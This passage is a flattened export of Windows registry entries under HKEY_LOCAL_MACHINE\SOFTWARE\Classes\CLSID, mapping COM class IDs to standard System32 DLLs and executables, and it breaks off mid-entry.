REG_EXPAND_SZ %systemroot%\System32\mswmdm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25BE9228-00AF-11D2-BF87-00C04FD8D5B0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25CBB996-92ED-457e-B28C-4774084BD562}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25EC352E-72E1-4724-9A28-4AE730072149}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\autoplay.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25ecf786-a925-4706-a269-eef5ad6899db}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IME\IMETC\IMTCCORE.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25F843F3-1ED6-4B4E-8749-DF294C7FEB30}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{263A4743-BC0D-40b6-8F7F-1B2135C204D2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26671179-2ec2-42bf-93d3-64108589cad5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{266C72D4-62E8-11D1-AD89-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemcons.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{266C72E5-62E8-11D1-AD89-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemcons.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{266C72E6-62E8-11D1-AD89-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemcons.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{266C72E7-62E8-11D1-AD89-00C04FD8FDFF}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\scrcons.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\kstvtune.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\kstvtune.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{267cf8a9-f4e3-41e6-95b1-af881be130ff}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26A1F020-DDD8-472D-8B7C-2F98B80024F3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmpeg2srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26D32566-760A-40A2-AA82-A40366528916} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63513 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26D32566-760A-40A2-AA82-A40366528916}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\wuapi.dll,-63101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-31361 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-4161 System.AppUserModel.RelaunchCommand REG_SZ %SystemRoot%\system32\control.exe System.AppUserModel.RelaunchDisplayNameResource REG_EXPAND_SZ #%SystemRoot%\system32\shell32.dll,-4161 System.AppUserModel.RelaunchIconResource REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EEC7CE-6C67-4568-BA8F-52BEA143D756}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26fdc864-be88-46e7-9235-032d8ea5162e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27171325-5F06-407C-AA8F-61154A674DE2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\XpsDocumentTargetPrint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{271C3902-6095-4c45-A22F-20091816EE9E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2737EE87-ABA3-4F28-89A6-C370484D85F9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{273eb5e7-88b0-4843-bfef-e2c81d43aae5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2744BC6A-4039-11E3-ABAD-8CFB6188709B}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{274fae1f-3626-11d1-a3a4-00c04fb950dc}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsldp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mlang.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2769280B-5108-498c-9C7F-A51239B63147}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{276C88CA-7533-4A86-B676-66B36080D484}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27949969-876A-41D7-9447-568F6A35A4DC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2797B627-B7FA-4CBF-9472-6B8ACFDF3E41}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27a4e414-20a5-4dc1-b426-e42289729560}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27AAD1C8-3564-4A15-B0B8-F73F90FB95A7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27c98999-2895-4829-b080-5a8b65bd3db0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AUDIOENG.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27D62E77-6AFE-4AAE-AF27-E6CC20A884D9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27F71832-6815-48CB-902A-7A1D891BA962}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\TrustedSignalCredProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{280A7B65-8F00-438F-989B-8EAF9E438A71}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{280ECF1B-B8F6-41B6-BC14-0E58035C4DCC}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\PackageStateChangeHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{286AA738-2928-49af-A410-4118F5C31626}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dot3hc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{286F484D-375E-4458-A272-B138E2F80A6A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{28803F59-3A75-4058-995F-4EE5503B023C} InfoTip REG_EXPAND_SZ @%systemroot%\system32\DevicePairingFolder.dll,-1501 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\DevicePairingFolder.dll,-1500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{28803F59-3A75-4058-995F-4EE5503B023C}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\DevicePairingFolder.dll,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{28803F59-3A75-4058-995F-4EE5503B023C}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DevicePairingFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{288a2d5f-253c-46b4-b58c-2ced3180b993}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\mofd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289228DE-A31E-11D1-A19C-0000F875B132}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289978AC-A101-4341-A817-21EBA7FD046D} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-6104 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289978AC-A101-4341-A817-21EBA7FD046D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{28D18BFA-85E3-4419-9AFD-7ECCE53F8D13}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{28F4700C-44EB-4BD8-BC25-95812DE98E08}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ppcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\VersionList 3.0 REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2933BF91-7B36-11D2-B20E-00C04F983E60}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2933BF94-7B36-11D2-B20E-00C04F983E60}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{293ccd4b-0d59-43c0-997e-3449c780ac65}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ttlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{294935CE-F637-4E7C-A41B-AB255460B862}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2959380c-1567-40ec-80b0-05907ad6f9de}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2965e715-eb66-4719-b53f-1672673bbefa}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2968B3C3-CC07-40BE-B78F-094B7C310479}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Vault.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{297EE78C-BA95-4E94-81D3-D6E7F089C7B5}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sysmain.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2984A9DB-5689-43AD-877D-14999A15DD46}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsrx_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{299D0193-6DAA-11d2-B679-006097DF5BD4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msieftp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29B5828C-CAB9-11D2-B35C-00105A1F8177}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29D365AE-D23B-4004-8658-5ED2A59CD77C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29EA1611-529B-4113-8EE3-EE0F6DD2C715}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29F06F0C-FB7F-44A5-83CD-D41705D5C525}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\ncprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2A614240-A4C5-4C33-BD87-1BC709331639}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\bidispl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2A744BD8-158A-4bbf-9513-4A656F6C01D7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2aa2b5fe-b846-4d07-810c-b21ee45320e3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\xmlprovi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2AABFCD0-1797-11D2-ABA2-00C04FB6C6FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2ACFC431-A2E7-4FC6-8C4B-0B4BD201A797}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2af6bcaa-f526-4803-aeb8-5777ce386647}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\raschapext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2AFCECBA-ABA5-404B-8F4F-15BECC9FEE20}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\ndisimplatcim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2B1C6F4F-4F0D-490F-8D88-A3EAF66130AC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MaintenanceUI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2B1FFCE5-DD0F-4f1f-B150-A87AE69CE009}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2B20FE1A-1B2C-4DC5-8595-616B0E182FD1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2B32ECC3-C3BB-4701-82BB-EB7FE370D999}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2B32ECC3-C3BB-4701-82BB-EB7FE370D999}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {2B32ECC3-C3BB-4701-82BB-EB7FE370D999} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2B4099B4-ABED-4014-881E-AB96D7CC4E48}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C01D35E-79DE-45DE-9D5F-11923C2D0894}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C256447-3F0D-4CBB-9D12-575BB20CDA0A} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\faultrep.dll,-5000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C3E140B-7A0D-42d1-B2AA-D343500A90CF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\comuid.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C5BC43E-3369-4C33-AB0C-BE9469677AF4} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\FirewallControlPanel.dll,-12122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C673043-FC2E-4d67-8920-517D24DEBD2C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ActionCenterCPL.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C786341-0E36-4BE8-AA51-524CC1F2AE15}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\NPSMDesktopProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2c86c843-77ae-4284-9722-27d65366543c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C875213-FCE5-11d1-A0B0-00C04FA31A86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2D0F7985-9EE6-427C-AAAA-A9D72CBFA853}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Windows.Security.Credentials.UI.UserConsentVerifier.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2D11CF10-4FE0-45B2-88DF-6FFBF92BE9AB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2D12DD17-6C4E-456E-A953-D210E3C64176}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2D1F634B-BA35-4BA0-A3B4-B03AC5FE724A}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\BthpanContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2d3468c1-36a7-43b6-ac24-d3f02fd9607a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DA1964A-7232-48BF-9946-D0510557C492}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LegacyNetUX.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DB5E62B-0D67-495F-8F9D-C2F0188647AC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DCD1DAF-A110-49c0-BFDB-6FDF557B5FDF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2de55398-137e-4c4c-bf72-5cc7f18d9109}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DE92DB3-CD3E-4ad6-80F9-089036E1C81E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DE967D6-9BE7-458A-9B1C-6D3A6FF425F8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationFramework.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\PlaySndSrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2df7b51e-797b-4d06-be71-d14a52cf8421}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsvr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2dfb3a35-6071-11d1-8c13-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsmsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E0BC2B7-6C66-4FD1-AF55-C2D671754431}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2e167ea7-85e3-4395-995a-77af9875d79a}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E17C0EF-2851-459b-A3C8-27A41D4BC9F7}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,7 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E17C0EF-2851-459b-A3C8-27A41D4BC9F7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E1DCDFF-AB5C-47B6-AD3B-169E65344720}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\RemoteWipeCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E8EA1E5-F406-46F5-AF10-661FD6539F28}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E9E59C0-B437-4981-A647-9C34B9B90891} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-6121 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2E9E59C0-B437-4981-A647-9C34B9B90891}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2EBDEE67-3505-43f8-9946-EA44ABC8E5B0}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2ED326ED-C4C0-434a-B4CE-FB0318D725A7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2EF44DE8-80C9-42D9-8541-F40EF0862FA3} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2EF44DE8-80C9-42D9-8541-F40EF0862FA3}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F0888F4-2C5B-4353-A395-40CF3B6BA29E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F096B28-C65D-4C05-A37E-7E88735E32FA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F2165FF-2C2D-4612-87B2-CC8E5002EF4C} LocalizedString REG_EXPAND_SZ @%SystemRoot%\\system32\\srchadmin.dll,-617 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F2165FF-2C2D-4612-87B2-CC8E5002EF4C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2f2dc38b-34d2-462c-add4-f74cc15510a1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2f49412a-3ed3-4da7-b041-f2a55fcc1150}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F5E64E3-0B46-4DAF-AEA6-721994E5AC8B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F63C206-752B-4B26-9DA7-CD264895A7C8}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F6CE85C-F9EE-43CA-90C7-8A9BD53A2467}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhshl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2f712f0f-ed71-474b-9529-9b9627ed0a6b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F7ED5E3-06C9-4B61-97DB-067CC8AE0664}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F86B8BD-EFF5-4C07-8FA5-60788517EF95}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\PrintManagementProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2f8891f3-f692-450e-a222-ff28d9daaaf8}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2f893820-7089-46cc-a6e8-c4aae45f151b}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcuiu.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F93C02D-77F9-46B4-95FB-8CBB81EEB62C}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {2F93C02D-77F9-46B4-95FB-8CBB81EEB62C} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2F94D7B0-BF63-11D1-A6A2-00C04FB9988E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrvut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2FB21955-33A2-46A0-8F60-B475DC33FD5A}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\prntvpt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{301B94BA-5D25-4A12-BFFE-3B6E7A616585}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{301F77B0-A470-11D0-8821-00A0C903B83C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{30276b4f-f25c-457c-a4b7-08574f8ea528}\InProcServer32 (Default) REG_EXPAND_SZ 